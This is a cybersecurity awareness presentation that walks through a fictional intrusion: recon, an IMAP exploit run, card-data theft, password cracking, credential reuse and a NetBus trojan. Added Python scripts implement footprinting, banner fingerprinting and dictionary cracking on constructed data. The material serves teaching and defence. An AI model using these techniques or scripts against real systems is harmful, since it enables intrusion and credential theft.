Coady Cybersecurity Cybercrime.ppt - HFMA Region 9
11/9/2015

Cybersecurity & Cybercrime

Mick Coady
Partner, Cybersecurity & Privacy
PwC


A Total Novice Can Be a Hacker Today
Attack Sophistication vs. Intruder Technical Knowledge

[Figure: timeline chart, 1980 to 2000. The vertical axis runs from Low to High; attack sophistication rises across the period while the technical knowledge an intruder needs falls. Techniques placed along the timeline, roughly in order of appearance:]

• password guessing
• self-replicating code
• password cracking
• exploiting known vulnerabilities
• disabling audits
• back doors
• hijacking sessions
• burglaries
• sweepers
• sniffers
• packet spoofing
• GUI
• automated probes/scans
• denial of service
• www attacks
• Tools
• "stealth" / advanced scanning techniques
• network mgmt. diagnostics
• distributed attack tools
• cross site scripting
• Staged
• Auto Coordinated

Common Threats

• Hackers – "Script Kiddies"
• Employees – former and disgruntled
• Domestic Competitors – "Competitive Intelligence"
• State Sponsored & Corporate Espionage
• Extremists – Earth Liberation Front (ELF)


Anatomy of an Attack

Modus Operandi

• Footprinting – Scanning – Enumeration – Penetration – Escalate Privilege – Stealing/Damaging Corp. Information
• Physical Penetrations
• Company Profiling – Open Source Research
• Known Exploits
• Port Redirection of Packets
• Trojans – remote controlling systems
• Zone Transfers
• SNMP Sweeps
• Router Exploitation
• Key Loggers – Software and Hardware devices
• Denial of Service
• Buffer Overflows


Anatomy of Attack: Physical Penetrations

• Surveillance
• Dumpster Diving
• Impersonation of Authorized Personnel


Bigwidget.net


Registrant: Big Widget, Inc. (BIGWIDGET_DOM)
  1111 Big Widget Drive
  Really Big, CA 90120 US

Domain Name: BIGWIDGET.NET

Administrative Contact, Technical Contact:     Zone Contact, Billing Contact:
  Simms, Haywood (HS69)                          Dodge, Rodger (RD32)
  [email protected]                               [email protected]
  1111 Big Widget Drive, UMIL04-07               1111 Big Widget Drive, UMIL04-47
  Really Big, CA 90210                           Really Big, CA 90210
  678-443-6001                                   678-443-6014

Record last updated on 24-June-2000
Record expires on 20-Mar-2010
Record created on 14-Mar-1998
Database last updated on 7-Jun-2000 15:54

Domain servers in listed order:
  EHECATL.BIGWIDGET.NET      10.1.1.53
  NS1-AUTH.SPRINTLINK.NET    206.228.179.10
  NS.COMMANDCORP.COM         130.205.70.10
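The whois record above is the "Company Profiling – Open Source Research" step: names, handles, phone numbers and name servers that feed impersonation and the later zone-transfer and scanning steps. The script below is an added example, not part of the deck, showing how a footprinting tool would pull those fields out and flag what matters. The record is retyped from the slide as a constructed string (the e-mail addresses are omitted because the page redacts them); the regular expressions are written for this record's layout and are an assumption, not a general whois parser.

```python
import ipaddress
import re

# Constructed sample: the slide's whois record, retyped; e-mail addresses omitted.
SAMPLE_WHOIS = """\
Registrant: Big Widget, Inc. (BIGWIDGET_DOM)
  1111 Big Widget Drive
  Really Big, CA 90120 US

Domain Name: BIGWIDGET.NET

Administrative Contact, Technical Contact:
  Simms, Haywood (HS69)  678-443-6001
Zone Contact, Billing Contact:
  Dodge, Rodger (RD32)  678-443-6014

Record last updated on 24-June-2000
Record expires on 20-Mar-2010
Record created on 14-Mar-1998
Database last updated on 7-Jun-2000 15:54

Domain servers in listed order:
  EHECATL.BIGWIDGET.NET    10.1.1.53
  NS1-AUTH.SPRINTLINK.NET  206.228.179.10
  NS.COMMANDCORP.COM       130.205.70.10
"""

# Patterns assumed for this record layout (legacy NSI-style output).
DOMAIN_RE = re.compile(r"^Domain Name:\s*(?P<domain>\S+)", re.I)
REGISTRANT_RE = re.compile(r"^Registrant:\s*(?P<org>[^(]+?)\s*\(", re.I)
CONTACT_RE = re.compile(
    r"^\s*(?P<last>[A-Za-z' -]+?),\s*(?P<first>[A-Za-z' -]+?)\s*"
    r"\((?P<handle>[A-Z0-9]+)\)\s*(?P<phone>[\d-]+)?"
)
NS_RE = re.compile(r"^\s*(?P<host>[A-Za-z0-9.-]+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$")


def parse_whois(text):
    """Extract domain, registrant, contacts (with the role heading they sit
    under) and name servers from a whois record in the layout above."""
    rec = {"domain": None, "registrant": None, "contacts": [], "nameservers": []}
    role = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.endswith("Contact:"):          # role heading for the lines below
            role = stripped.rstrip(":")
            continue
        m = DOMAIN_RE.match(line)
        if m:
            rec["domain"] = m.group("domain").lower()
            continue
        m = REGISTRANT_RE.match(line)
        if m:
            rec["registrant"] = m.group("org")
            continue
        m = CONTACT_RE.match(line)
        if m:
            rec["contacts"].append({
                "name": f"{m.group('first')} {m.group('last')}",
                "handle": m.group("handle"),
                "phone": m.group("phone"),
                "role": role,
            })
            continue
        m = NS_RE.match(line)
        if m:
            rec["nameservers"].append((m.group("host").lower(), m.group("ip")))
    return rec


def footprint_findings(rec):
    """What an attacker (or a defender reviewing their own record) takes away."""
    findings = []
    domain = rec["domain"] or ""
    for host, ip in rec["nameservers"]:
        if ipaddress.ip_address(ip).is_private:
            findings.append({"kind": "private_ns", "subject": host,
                             "note": f"{ip} is RFC 1918 space: internal addressing leaked or record stale"})
        if host == domain or host.endswith("." + domain):
            findings.append({"kind": "in_domain_ns", "subject": host,
                             "note": "DNS hosted in-domain; first target for a zone-transfer (AXFR) attempt"})
    for c in rec["contacts"]:
        findings.append({"kind": "contact", "subject": c["name"],
                         "note": f"{c['role']}; phone {c['phone']}: pretext material for impersonation"})
    return findings


if __name__ == "__main__":
    for f in footprint_findings(parse_whois(SAMPLE_WHOIS)):
        print(f"{f['kind']:13} {f['subject']:25} {f['note']}")
```

On this record the script flags the in-domain name server EHECATL.BIGWIDGET.NET, its private 10.1.1.53 address, and the two named contacts with direct phone numbers; the same check run against your own domain tells you what a stranger learns before sending a single packet.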

hacker:~$ telnet mail.bigwidget.net 25
Trying 10.1.1.10 ...
Connected to mail.bigwidget.net.
Escape character is '^]'.
Connection closed by foreign host.
hacker:~$

hacker:~$ telnet mail.bigwidget.net 143
Trying 10.1.1.10...
Connected to mail.bigwidget.net.
Escape character is '^]'.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)
(Report problems in this server to [email protected])
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.
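The two telnet sessions above are the enumeration step: the IMAP greeting hands over the product and exact build ("IMAP4rev1 Service 9.0(157)"), which is what gets matched against a list of known exploits on the next slide. The following is an added example, not code from the deck, that turns banners like these into structured service/version records; the banners are retyped from the slides as constructed strings, the rule patterns only cover the products that appear on the slides, and `grab_banner` is an assumed helper for running the same check live.

```python
import re
import socket

# Constructed banners, retyped from the sessions on the slides.
IMAP_BANNER = "* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)"
FTP_BANNER = "220 thesource Microsoft FTP Service (Version 4.0)."
TELNET_BANNER = "Microsoft (R) Windows 2000\r\nWelcome to MS Telnet Service\r\nTelnet Server Build 5.00.98217.1\r\n"
LOGIN_BANNER = "Red Hat Linux release 4.2 (Biltmore)\nKernel 2.0.35 on an i686\nlogin: "

# (service, pattern); first match wins. Patterns are assumptions written for the
# products on the slides; extend the list for other software.
BANNER_RULES = [
    ("imap", re.compile(r"^\* OK (?P<host>\S+) (?P<product>IMAP4rev1 Service) (?P<version>[\d.()]+)")),
    ("ftp", re.compile(r"^220[ -](?P<host>\S+) (?P<product>Microsoft FTP Service) \(Version (?P<version>[\d.]+)\)")),
    ("telnet", re.compile(r"(?P<product>Telnet Server) Build (?P<version>[\d.]+)")),
    ("login", re.compile(r"(?P<product>Red Hat Linux) release (?P<version>[\d.]+).*?Kernel (?P<kernel>[\d.]+)", re.S)),
]

# Fallback when only the port tells us which protocol answered.
GENERIC_PORTS = {21: "ftp", 23: "telnet", 25: "smtp", 143: "imap"}


def fingerprint(banner, port=None):
    """Return {service, host, product, version[, extra groups]} or None."""
    for service, rule in BANNER_RULES:
        m = rule.search(banner)
        if m:
            info = {"service": service, "host": None, "product": None, "version": None}
            info.update(m.groupdict())
            return info
    if port in GENERIC_PORTS:
        return {"service": GENERIC_PORTS[port], "host": None, "product": None, "version": None}
    return None


def grab_banner(host, port, timeout=3.0):
    """Live equivalent of the telnet step: connect, read what the service
    volunteers before any input, return it as text. Not used offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            data = s.recv(1024)
        except socket.timeout:
            data = b""
    return data.decode("latin-1")


def version_disclosures(observed):
    """observed: list of (host, port, banner). Returns (host, port, product,
    version) for every service that tells a stranger exactly what it runs."""
    out = []
    for host, port, banner in observed:
        info = fingerprint(banner, port)
        if info and info["version"]:
            out.append((host, port, info["product"], info["version"]))
    return out


if __name__ == "__main__":
    observed = [("10.1.1.10", 143, IMAP_BANNER), ("10.1.1.15", 21, FTP_BANNER),
                ("10.1.1.15", 23, TELNET_BANNER), ("10.1.1.10", 23, LOGIN_BANNER)]
    for row in version_disclosures(observed):
        print(row)
```

Run the offline demo and every host on the slides reports a product and build string. The defensive reading is the same list in reverse: anything `version_disclosures` returns for your own address space is a service whose patch level an outsider can look up without authenticating, so either suppress the version in the greeting or make sure the build is one with no public exploit.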


[Slide 13: a publicly available exploit for the IMAP service identified on the previous slide is run against the mail server and yields a root login; the /etc/hosts file on the compromised host then maps the internal network by role.]

hacker:~$ ./imap_exploit mail.bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius ([email protected])
Modifications: p1 ([email protected])
Completed successfully.

hacker:~$ telnet mail.bigwidget.com
Trying 10.1.1.10...
Connected to mail.bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
login: root
bigwidget:~# whoami
root
bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1   localhost localhost.localdomain
10.1.1.9    thevault     medical records
10.1.1.11   fasttalk     PACS
10.1.1.12   geekspeak    engineering
10.1.1.13   people       human resources
10.1.1.14   thelinks     finance
10.1.1.15   thesource    information systems


[Slide 15: data found on the compromised mail host, the system password file run through a cracking tool, and the cracked jsmith credential reused against the Windows file server thesource.]

bigwidget:~# cd /data/creditcards
bigwidget:~# cat visa.txt
Allan B. Smith     6543-2223-1209-4002  12/99
Donna D. Smith     6543-4133-0632-4572  06/98
Jim Smith          6543-2344-1523-5522  01/01
Joseph L. Smith    6543-2356-1882-7532  04/02
Kay L. Smith       6543-2398-1972-4532  06/03
Mary Ann Smith     6543-8933-1332-4222  05/01
Robert F. Smith    6543-0133-5232-3332  05/99

bigwidget:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman   password: nambob
username: jsmith   password: redbirds
username: root     password:

bigwidget:~# ftp thesource
Connected to thesource
220 thesource Microsoft FTP Service (Version 4.0).
Name: jsmith
331 Password required for jsmith.
Password: ********
230 User jsmith logged in.
Remote system type is Windows_NT.
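Two things on that slide carry the attack forward: the password file cracks with trivial rules (bobman's password is his username reversed, jsmith's is a dictionary word), and the cracked jsmith password opens the FTP server on thesource as well. The script below is an added example, not the deck's tool, that shows both steps offline. The password file and the thesource account store are constructed; the hash is a salted SHA-256 stand-in labelled as an assumption (the 1998 hosts on the slides would have used DES crypt(3)), and the word list is a deliberately tiny stand-in for a real dictionary.

```python
import hashlib
import os

# Assumption: stand-in for crypt(3). The stored field is "salt$hex(sha256(salt||password))".
def hash_password(salt, password):
    return hashlib.sha256((salt + password).encode()).hexdigest()


def make_entry(user, uid, password, salt=None):
    """Build one passwd-style line with the hash in the password field."""
    salt = salt or os.urandom(4).hex()
    return f"{user}:{salt}${hash_password(salt, password)}:{uid}:{uid}:{user}:/home/{user}:/bin/sh"


# Constructed /etc/passwd for the mail host: the three accounts the slide shows.
MAIL_PASSWD = "\n".join([
    make_entry("root", 0, "Xy!7$kqP9#rVz", salt="a1b2c3d4"),     # not in any list
    make_entry("bobman", 1001, "nambob", salt="00112233"),        # username reversed
    make_entry("jsmith", 1002, "redbirds", salt="deadbeef"),      # dictionary word
])

# Constructed account store for thesource, with its own salts: jsmith reused his password.
THESOURCE_ACCOUNTS = {
    "jsmith": ("cafef00d", hash_password("cafef00d", "redbirds")),
    "admin": ("0badf00d", hash_password("0badf00d", "not-reused-9Q")),
}

# Constructed word list; a real run uses a dictionary of millions of entries.
WORDLIST = ["password", "letmein", "redbirds", "bluebird", "widget"]


def candidates(user, wordlist):
    """Mangling rules: username, dictionary words, each reversed, with a few
    common suffixes. Yields each candidate once."""
    base = [user, user[::-1]] + wordlist + [w[::-1] for w in wordlist]
    seen = set()
    for w in base:
        for cand in (w, w.capitalize(), w + "1", w + "123"):
            if cand not in seen:
                seen.add(cand)
                yield cand


def parse_passwd(text):
    users = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, field = line.split(":")[:2]
        salt, digest = field.split("$", 1)
        users[user] = (salt, digest)
    return users


def crack(passwd_text, wordlist):
    """Dictionary attack: hash every candidate with the account's salt and
    compare. Returns {user: password} for the accounts that fall."""
    cracked = {}
    for user, (salt, digest) in parse_passwd(passwd_text).items():
        for cand in candidates(user, wordlist):
            if hash_password(salt, cand) == digest:
                cracked[user] = cand
                break
    return cracked


def reuse_across_systems(cracked, other_accounts):
    """Try every cracked password against another system's stored hashes.
    Returns (account on other system, source user, password) for each hit."""
    hits = []
    for user, (salt, digest) in other_accounts.items():
        for src_user, pw in cracked.items():
            if hash_password(salt, pw) == digest:
                hits.append((user, src_user, pw))
    return hits


if __name__ == "__main__":
    found = crack(MAIL_PASSWD, WORDLIST)
    print("cracked:", found)
    print("reused on thesource:", reuse_across_systems(found, THESOURCE_ACCOUNTS))
```

Root survives because its password is in no list and follows no rule, which is the whole argument for length and unpredictability over complexity theatre. The reuse check is the defensive half: run it against your own password stores (it needs only the cracked plaintexts and the other system's hashes) and every hit is an account that one compromised host would hand an attacker for free, exactly as jsmith's did here.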


[Slide 17: with the reused jsmith credential, a NetBus remote-control trojan is uploaded to thesource over FTP and started through the Windows telnet service.]

ftp> cd \temp
250 CWD command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer complete.
ftp> quit

thevault:~$ telnet thesource
Trying 10.1.1.15...
Connected to thesource.bigwidget.com.
Escape character is '^]'.
Microsoft (R) Windows 2000
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login: jsmith
password: ********
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>cd \temp
C:\TEMP> netbus.exe

NetBus 1.6, by cf

[Slide 18: NetBus screendump, "Connected to the.source.bigwidget.com", and the message sent to the company's employees:]

David Smith
Postmaster < [email protected] >
[email protected]; [email protected]
Greetings < URGENT >

Greetings Bigwidget employees:

I have officially compromised your entire system, and have obtained all of your accounting information.

Yours Truly,
Friendly Hacker


Anatomy of Attack (Continued)

[Figure: network diagram of the attack path. Labelled elements: Router, Firewall, Web, FTP, Clients & Workstations, with the imap and NetBus steps of the attack marked against the hosts they were used on.]

Cyber Security

http://map.ipviking.com